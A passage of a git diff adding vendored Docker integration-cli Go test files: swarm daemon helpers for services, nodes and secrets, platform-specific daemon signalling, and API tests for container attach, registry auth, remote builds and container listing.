+	url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index)
+	status, out, err := d.SockRequest("POST", url, service.Spec)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) removeService(c *check.C, id string) {
+	status, out, err := d.SockRequest("DELETE", "/services/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node {
+	var node swarm.Node
+	status, out, err := d.SockRequest("GET", "/nodes/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &node), checker.IsNil)
+	c.Assert(node.ID, checker.Equals, id)
+	return &node
+}
+
+func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) {
+	url := "/nodes/" + id
+	if force {
+		url += "?force=1"
+	}
+
+	status, out, err := d.SockRequest("DELETE", url, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) {
+	for i := 0; ; i++ {
+		node := d.getNode(c, id)
+		for _, fn := range f {
+			fn(node)
+		}
+		url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index)
+		status, out, err := d.SockRequest("POST", url, node.Spec)
+		if i < 10 && strings.Contains(string(out), "update out of sequence") {
+			time.Sleep(100 * time.Millisecond)
+			continue
+		}
+		c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+		c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+		return
+	}
+}
+
+func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node {
+	status, out, err := d.SockRequest("GET", "/nodes", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+
+	nodes := []swarm.Node{}
+	c.Assert(json.Unmarshal(out, &nodes), checker.IsNil)
+	return nodes
+}
+
+func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service {
+	status, out, err := d.SockRequest("GET", "/services", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+
+	services := []swarm.Service{}
+	c.Assert(json.Unmarshal(out, &services), checker.IsNil)
+	return services
+}
+
+func (d *SwarmDaemon) createSecret(c *check.C, secretSpec swarm.SecretSpec) string {
+	status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec)
+
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out)))
+
+	var scr types.SecretCreateResponse
+	c.Assert(json.Unmarshal(out, &scr), checker.IsNil)
+	return scr.ID
+}
+
+func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret {
+	status, out, err := d.SockRequest("GET", "/secrets", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+
+	secrets := []swarm.Secret{}
+	c.Assert(json.Unmarshal(out, &secrets), checker.IsNil)
+	return secrets
+}
+
+func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret {
+	var secret swarm.Secret
+	status, out, err := d.SockRequest("GET", "/secrets/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &secret), checker.IsNil)
+	return &secret
+}
+
+func (d *SwarmDaemon) deleteSecret(c *check.C, id string) {
+	status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm {
+	var sw swarm.Swarm
+	status, out, err := d.SockRequest("GET", "/swarm", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
+	return sw
+}
+
+func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) {
+	sw := d.getSwarm(c)
+	for _, fn := range f {
+		fn(&sw.Spec)
+	}
+	url := fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index)
+	status, out, err := d.SockRequest("POST", url, sw.Spec)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) rotateTokens(c *check.C) {
+	var sw swarm.Swarm
+	status, out, err := d.SockRequest("GET", "/swarm", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
+
+	url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index)
+	status, out, err = d.SockRequest("POST", url, sw.Spec)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+}
+
+func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens {
+	var sw swarm.Swarm
+	status, out, err := d.SockRequest("GET", "/swarm", nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
+	return sw.JoinTokens
+}
+
+func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) {
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	return info.LocalNodeState, nil
+}
+
+func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) {
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	return info.ControlAvailable, nil
+}
+
+func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) {
+	errList := check.Commentf("could not get node list")
+	status, out, err := d.SockRequest("GET", "/nodes", nil)
+	if err != nil {
+		return err, errList
+	}
+	if status != http.StatusOK {
+		return fmt.Errorf("expected http status OK, got: %d", status), errList
+	}
+
+	var ls []swarm.Node
+	if err := json.Unmarshal(out, &ls); err != nil {
+		return err, errList
+	}
+
+	for _, node := range ls {
+		if node.ManagerStatus != nil && node.ManagerStatus.Leader {
+			return nil, nil
+		}
+	}
+	return fmt.Errorf("no leader"), check.Commentf("could not find leader")
+}
+
+func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) {
+	for i := 0; ; i++ {
+		out, err := d.Cmd(args...)
+		if err != nil {
+			if strings.Contains(out, "update out of sequence") {
+				if i < 10 {
+					continue
+				}
+			}
+		}
+		return out, err
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go
new file mode 100644
index 0000000000..0cea901420
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go
@@ -0,0 +1,20 @@
+package main
+
+import "github.com/go-check/check"
+
+func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon {
+	s.daemonsLock.Lock()
+	defer s.daemonsLock.Unlock()
+	for _, d := range s.daemons {
+		if d.NodeID == nodeID {
+			return d
+		}
+	}
+	c.Fatalf("could not find node with id: %s", nodeID)
+	return nil
+}
+
+// nodeCmd executes a command on a given node via the normal docker socket
+func (s *DockerSwarmSuite) nodeCmd(c *check.C, id string, args ...string) (string, error) {
+	return s.getDaemon(c, id).Cmd(args...)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go
new file mode 100644
index 0000000000..6ca7daf21c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go
@@ -0,0 +1,35 @@
+// +build !windows
+
+package main
+
+import (
+	"os"
+	"path/filepath"
+	"syscall"
+
+	"github.com/go-check/check"
+)
+
+func cleanupExecRoot(c *check.C, execRoot string) {
+	// Cleanup network namespaces in the exec root of this
+	// daemon because this exec root is specific to this
+	// daemon instance and has no chance of getting
+	// cleaned up when a new daemon is instantiated with a
+	// new exec root.
+	netnsPath := filepath.Join(execRoot, "netns")
+	filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error {
+		if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil {
+			c.Logf("unmount of %s failed: %v", path, err)
+		}
+		os.Remove(path)
+		return nil
+	})
+}
+
+func signalDaemonDump(pid int) {
+	syscall.Kill(pid, syscall.SIGQUIT)
+}
+
+func signalDaemonReload(pid int) error {
+	return syscall.Kill(pid, syscall.SIGHUP)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go
new file mode 100644
index 0000000000..885b703b33
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go
@@ -0,0 +1,53 @@
+package main
+
+import (
+	"fmt"
+	"strconv"
+	"syscall"
+	"unsafe"
+
+	"github.com/go-check/check"
+	"golang.org/x/sys/windows"
+)
+
+func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) {
+	namep, _ := syscall.UTF16PtrFromString(name)
+	var _p2 uint32
+	if inheritHandle {
+		_p2 = 1
+	}
+	r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep)))
+	handle = syscall.Handle(r0)
+	if handle == syscall.InvalidHandle {
+		err = e1
+	}
+	return
+}
+
+func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) {
+	r0, _, _ := proc.Call(uintptr(handle))
+	if r0 != 0 {
+		err = syscall.Errno(r0)
+	}
+	return
+}
+
+func signalDaemonDump(pid int) {
+	modkernel32 := windows.NewLazySystemDLL("kernel32.dll")
+	procOpenEvent := modkernel32.NewProc("OpenEventW")
+	procPulseEvent := modkernel32.NewProc("PulseEvent")
+
+	ev := "Global\\docker-daemon-" + strconv.Itoa(pid)
+	h2, _ := openEvent(0x0002, false, ev, procOpenEvent)
+	if h2 == 0 {
+		return
+	}
+	pulseEvent(h2, procPulseEvent)
+}
+
+func signalDaemonReload(pid int) error {
+	return fmt.Errorf("daemon reload not supported")
+}
+
+func cleanupExecRoot(c *check.C, execRoot string) {
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
new file mode 100644
index 0000000000..d43bf3ab0e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
@@ -0,0 +1,210 @@
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"io"
+	"net"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/go-check/check"
+	"golang.org/x/net/websocket"
+)
+
+func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat")
+
+	rwc, err := sockConn(time.Duration(10*time.Second), "")
+	c.Assert(err, checker.IsNil)
+
+	cleanedContainerID := strings.TrimSpace(out)
+	config, err := websocket.NewConfig(
+		"/containers/"+cleanedContainerID+"/attach/ws?stream=1&stdin=1&stdout=1&stderr=1",
+		"http://localhost",
+	)
+	c.Assert(err, checker.IsNil)
+
+	ws, err := websocket.NewClient(config, rwc)
+	c.Assert(err, checker.IsNil)
+	defer ws.Close()
+
+	expected := []byte("hello")
+	actual := make([]byte, len(expected))
+
+	outChan := make(chan error)
+	go func() {
+		_, err := io.ReadFull(ws, actual)
+		outChan <- err
+		close(outChan)
+	}()
+
+	inChan := make(chan error)
+	go func() {
+		_, err := ws.Write(expected)
+		inChan <- err
+		close(inChan)
+	}()
+
+	select {
+	case err := <-inChan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(5 * time.Second):
+		c.Fatal("Timeout writing to ws")
+	}
+
+	select {
+	case err := <-outChan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(5 * time.Second):
+		c.Fatal("Timeout reading from ws")
+	}
+
+	c.Assert(actual, checker.DeepEquals, expected, check.Commentf("Websocket didn't return the expected data"))
+}
+
+// regression gh14320
+func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) {
+	req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "")
+	c.Assert(err, checker.IsNil)
+
+	resp, err := client.Do(req)
+	// connection will shutdown, err should be "persistent connection closed"
+	c.Assert(err, checker.NotNil) // Server shutdown connection
+
+	body, err := readBody(resp.Body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound)
+	expected := "No such container: doesnotexist\r\n"
+	c.Assert(string(body), checker.Equals, expected)
+}
+
+func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) {
+	status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+	c.Assert(err, checker.IsNil)
+	expected := "No such container: doesnotexist"
+	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expectSuccess := func(conn net.Conn, br *bufio.Reader, stream string, tty bool) {
+		defer conn.Close()
+		expected := []byte("success")
+		_, err := conn.Write(expected)
+		c.Assert(err, checker.IsNil)
+
+		conn.SetReadDeadline(time.Now().Add(time.Second))
+		lenHeader := 0
+		if !tty {
+			lenHeader = 8
+		}
+		actual := make([]byte, len(expected)+lenHeader)
+		_, err = io.ReadFull(br, actual)
+		c.Assert(err, checker.IsNil)
+		if !tty {
+			fdMap := map[string]byte{
+				"stdin":  0,
+				"stdout": 1,
+				"stderr": 2,
+			}
+			c.Assert(actual[0], checker.Equals, fdMap[stream])
+		}
+		c.Assert(actual[lenHeader:], checker.DeepEquals, expected, check.Commentf("Attach didn't return the expected data from %s", stream))
+	}
+
+	expectTimeout := func(conn net.Conn, br *bufio.Reader, stream string) {
+		defer conn.Close()
+		_, err := conn.Write([]byte{'t'})
+		c.Assert(err, checker.IsNil)
+
+		conn.SetReadDeadline(time.Now().Add(time.Second))
+		actual := make([]byte, 1)
+		_, err = io.ReadFull(br, actual)
+		opErr, ok := err.(*net.OpError)
+		c.Assert(ok, checker.Equals, true, check.Commentf("Error is expected to be *net.OpError, got %v", err))
+		c.Assert(opErr.Timeout(), checker.Equals, true, check.Commentf("Read from %s is expected to timeout", stream))
+	}
+
+	// Create a container that only emits stdout.
+	cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat")
+	cid = strings.TrimSpace(cid)
+	// Attach to the container's stdout stream.
+	conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	// Check if the data from stdout can be received.
+	expectSuccess(conn, br, "stdout", false)
+	// Attach to the container's stderr stream.
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	// Since the container only emits stdout, attaching to stderr should return nothing.
+	expectTimeout(conn, br, "stdout")
+
+	// Test the similar functions of the stderr stream.
+	cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2")
+	cid = strings.TrimSpace(cid)
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	expectSuccess(conn, br, "stderr", false)
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	expectTimeout(conn, br, "stderr")
+
+	// Test with tty.
+	cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2")
+	cid = strings.TrimSpace(cid)
+	// Attach to stdout only.
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	expectSuccess(conn, br, "stdout", true)
+
+	// Attach without stdout stream.
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	c.Assert(err, checker.IsNil)
+	// Nothing should be received because both the stdout and stderr of the container will be
+	// sent to the client as stdout when tty is enabled.
+	expectTimeout(conn, br, "stdout")
+
+	// Test the client API
+	// Make sure we don't see "hello" if Logs is false
+	client, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+
+	cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat")
+	cid = strings.TrimSpace(cid)
+
+	attachOpts := types.ContainerAttachOptions{
+		Stream: true,
+		Stdin:  true,
+		Stdout: true,
+	}
+
+	resp, err := client.ContainerAttach(context.Background(), cid, attachOpts)
+	c.Assert(err, checker.IsNil)
+	expectSuccess(resp.Conn, resp.Reader, "stdout", false)
+
+	// Make sure we do see "hello" if Logs is true
+	attachOpts.Logs = true
+	resp, err = client.ContainerAttach(context.Background(), cid, attachOpts)
+	c.Assert(err, checker.IsNil)
+
+	defer resp.Conn.Close()
+	resp.Conn.SetReadDeadline(time.Now().Add(time.Second))
+
+	_, err = resp.Conn.Write([]byte("success"))
+	c.Assert(err, checker.IsNil)
+
+	actualStdout := new(bytes.Buffer)
+	actualStderr := new(bytes.Buffer)
+	stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader)
+	c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
new file mode 100644
index 0000000000..bfcae31bd0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
@@ -0,0 +1,25 @@
+package main
+
+import (
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// Test case for #22244
+func (s *DockerSuite) TestAuthAPI(c *check.C) {
+	testRequires(c, Network)
+	config := types.AuthConfig{
+		Username: "no-user",
+		Password: "no-password",
+	}
+
+	expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password"
+	status, body, err := sockRequest("POST", "/auth", config)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusUnauthorized)
+	msg := getErrorMessage(c, body)
+	c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
new file mode 100644
index 0000000000..9b069a43a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go
@@ -0,0 +1,254 @@
+package main
+
+import (
+	"archive/tar"
+	"bytes"
+	"net/http"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) {
+	testRequires(c, NotUserNamespace)
+	var testD string
+	if daemonPlatform == "windows" {
+		testD = `FROM busybox
+COPY * /tmp/
+RUN find / -name ba*
+RUN find /tmp/`
+	} else {
+		// -xdev is required because sysfs can cause EPERM
+		testD = `FROM busybox
+COPY * /tmp/
+RUN find / -xdev -name ba*
+RUN find /tmp/`
+	}
+	server, err := fakeStorage(map[string]string{"testD": testD})
+	c.Assert(err, checker.IsNil)
+	defer server.Close()
+
+	res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	buf, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	// Make sure Dockerfile exists.
+	// Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL
+	out := string(buf)
+	c.Assert(out, checker.Contains, "/tmp/Dockerfile")
+	c.Assert(out, checker.Not(checker.Contains), "baz")
+}
+
+func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) {
+	buffer := new(bytes.Buffer)
+	tw := tar.NewWriter(buffer)
+	defer tw.Close()
+
+	dockerfile := []byte("FROM busybox")
+	err := tw.WriteHeader(&tar.Header{
+		Name: "Dockerfile",
+		Size: int64(len(dockerfile)),
+	})
+	// failed to write tar file header
+	c.Assert(err, checker.IsNil)
+
+	_, err = tw.Write(dockerfile)
+	// failed to write tar file content
+	c.Assert(err, checker.IsNil)
+
+	// failed to close tar archive
+	c.Assert(tw.Close(), checker.IsNil)
+
+	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+		"testT.tar": buffer,
+	})
+	c.Assert(err, checker.IsNil)
+
+	defer server.Close()
+
+	res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+	b.Close()
+}
+
+func (s *DockerSuite) TestBuildAPIRemoteTarballContextWithCustomDockerfile(c *check.C) {
+	buffer := new(bytes.Buffer)
+	tw := tar.NewWriter(buffer)
+	defer tw.Close()
+
+	dockerfile := []byte(`FROM busybox
+RUN echo 'wrong'`)
+	err := tw.WriteHeader(&tar.Header{
+		Name: "Dockerfile",
+		Size: int64(len(dockerfile)),
+	})
+	// failed to write tar file header
+	c.Assert(err, checker.IsNil)
+
+	_, err = tw.Write(dockerfile)
+	// failed to write tar file content
+	c.Assert(err, checker.IsNil)
+
+	custom := []byte(`FROM busybox
+RUN echo 'right'
+`)
+	err = tw.WriteHeader(&tar.Header{
+		Name: "custom",
+		Size: int64(len(custom)),
+	})
+
+	// failed to write tar file header
+	c.Assert(err, checker.IsNil)
+
+	_, err = tw.Write(custom)
+	// failed to write tar file content
+	c.Assert(err, checker.IsNil)
+
+	// failed to close tar archive
+	c.Assert(tw.Close(), checker.IsNil)
+
+	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+		"testT.tar": buffer,
+	})
+	c.Assert(err, checker.IsNil)
+
+	defer server.Close()
+	url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar"
+	res, body, err := sockRequestRaw("POST", url, nil, "application/tar")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	defer body.Close()
+	content, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	// Build used the wrong dockerfile.
+	c.Assert(string(content), checker.Not(checker.Contains), "wrong")
+}
+
+func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) {
+	git, err := newFakeGit("repo", map[string]string{
+		"dockerfile": `FROM busybox
+RUN echo from dockerfile`,
+	}, false)
+	c.Assert(err, checker.IsNil)
+	defer git.Close()
+
+	res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	buf, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	out := string(buf)
+	c.Assert(out, checker.Contains, "from dockerfile")
+}
+
+func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) {
+	git, err := newFakeGit("repo", map[string]string{
+		"baz": `FROM busybox
+RUN echo from baz`,
+		"Dockerfile": `FROM busybox
+RUN echo from Dockerfile`,
+	}, false)
+	c.Assert(err, checker.IsNil)
+	defer git.Close()
+
+	// Make sure it tries to 'dockerfile' query param value
+	res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	buf, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	out := string(buf)
+	c.Assert(out, checker.Contains, "from baz")
+}
+
+func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) {
+	testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows
+	git, err := newFakeGit("repo", map[string]string{
+		"Dockerfile": `FROM busybox
+RUN echo from Dockerfile`,
+		"dockerfile": `FROM busybox
+RUN echo from dockerfile`,
+	}, false)
+	c.Assert(err, checker.IsNil)
+	defer git.Close()
+
+	// Make sure it tries to 'dockerfile' query param value
+	res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+	buf, err := readBody(body)
+	c.Assert(err, checker.IsNil)
+
+	out := string(buf)
+	c.Assert(out, checker.Contains, "from Dockerfile")
+}
+
+func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) {
+	// Make sure that build context tars with entries of the form
+	// x/./y don't cause caching false positives.
+
+	buildFromTarContext := func(fileContents []byte) string {
+		buffer := new(bytes.Buffer)
+		tw := tar.NewWriter(buffer)
+		defer tw.Close()
+
+		dockerfile := []byte(`FROM busybox
+	COPY dir /dir/`)
+		err := tw.WriteHeader(&tar.Header{
+			Name: "Dockerfile",
+			Size: int64(len(dockerfile)),
+		})
+		//failed to write tar file header
+		c.Assert(err, checker.IsNil)
+
+		_, err = tw.Write(dockerfile)
+		// failed to write Dockerfile in tar file content
+		c.Assert(err, checker.IsNil)
+
+		err = tw.WriteHeader(&tar.Header{
+			Name: "dir/./file",
+			Size: int64(len(fileContents)),
+		})
+		//failed to write tar file header
+		c.Assert(err, checker.IsNil)
+
+		_, err = tw.Write(fileContents)
+		// failed to write file contents in tar file content
+		c.Assert(err, checker.IsNil)
+
+		// failed to close tar archive
+		c.Assert(tw.Close(), checker.IsNil)
+
+		res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar")
+		c.Assert(err, checker.IsNil)
+		c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
+
+		out, err := readBody(body)
+		c.Assert(err, checker.IsNil)
+		lines := strings.Split(string(out), "\n")
+		c.Assert(len(lines), checker.GreaterThan, 1)
+		c.Assert(lines[len(lines)-2], checker.Matches, ".*Successfully built [0-9a-f]{12}.*")
+
+		re := regexp.MustCompile("Successfully built ([0-9a-f]{12})")
+		matches := re.FindStringSubmatch(lines[len(lines)-2])
+		return matches[1]
+	}
+
+	imageA := buildFromTarContext([]byte("abc"))
+	imageB := buildFromTarContext([]byte("def"))
+
+	c.Assert(imageA, checker.Not(checker.Equals), imageB)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
new file mode 100644
index 0000000000..d046ec0684
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go
@@ -0,0 +1,1961 @@
+package main
+
+import (
+	"archive/tar"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httputil"
+	"net/url"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/pkg/integration"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) {
+	startCount, err := getContainerCount()
+	c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count"))
+
+	name := "getall"
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+
+	status, body, err := sockRequest("GET", "/containers/json?all=1", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+
+	var inspectJSON []struct {
+		Names []string
+	}
+	err = json.Unmarshal(body, &inspectJSON)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body"))
+
+	c.Assert(inspectJSON, checker.HasLen, startCount+1)
+
+	actual := inspectJSON[0].Names[0]
+	c.Assert(actual, checker.Equals, "/"+name)
+}
+
+// regression test for empty json field being omitted #13691
